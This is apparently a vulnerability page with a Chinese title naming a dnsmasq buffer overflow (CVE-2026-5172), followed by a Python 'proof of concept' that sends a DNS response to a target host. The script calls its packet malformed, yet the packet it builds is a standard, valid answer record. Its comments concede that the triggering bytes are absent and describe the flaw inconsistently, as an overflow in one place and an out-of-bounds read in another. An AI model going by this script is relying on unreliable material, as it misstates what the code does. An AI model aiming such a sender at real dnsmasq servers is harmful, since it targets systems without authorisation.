CVE-2026-5172 dnsmasq缓冲区溢出漏洞

import socket import struct # Conceptual Proof of Concept for CVE-2026-5172 # This script sends a malformed DNS response to trigger the buffer overflow. # Note: This is for educational purposes only. def create_malformed_dns_packet(): # DNS Header # ID: 0x1337, Flags: Response (0x8180), QDCOUNT: 1, ANCOUNT: 1, NSCOUNT: 0, ARCOUNT: 0 header = struct.pack('!HHHHHH', 0x1337, 0x8180, 1, 1, 0, 0) # Question Section (example.com) question = b'\x07example\x03com\x00' question += struct.pack('!HH', 1, 1) # Type A, Class IN # Answer Section (Malformed) # The vulnerability involves the pointer in name compression or label length. # We construct a name that might cause extract_name() to advance incorrectly. # Using a specific label length or pointer offset to test boundaries. answer_name = b'\xc0\x0c' # Pointer to offset 12 (start of question name) answer_type = struct.pack('!H', 1) answer_class = struct.pack('!H', 1) answer_ttl = struct.pack('!I', 60) answer_rdlength = struct.pack('!H', 4) answer_rdata = b'\x01\x02\x03\x04' # In a real exploit, the specific bytes would be crafted to bypass checks # and trigger the heap out-of-bounds read in extract_addresses(). answer = answer_name + answer_type + answer_class + answer_ttl + answer_rdlength + answer_rdata return header + question + answer def send_poc(target_ip, target_port=53): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) packet = create_malformed_dns_packet() sock.sendto(packet, (target_ip, target_port)) print(f"[+] Malformed DNS packet sent to {target_ip}:{target_port}") sock.close() except Exception as e: print(f"[-] Error sending packet: {e}") if __name__ == "__main__": # Replace with the target IP running dnsmasq target = "127.0.0.1" send_poc(target)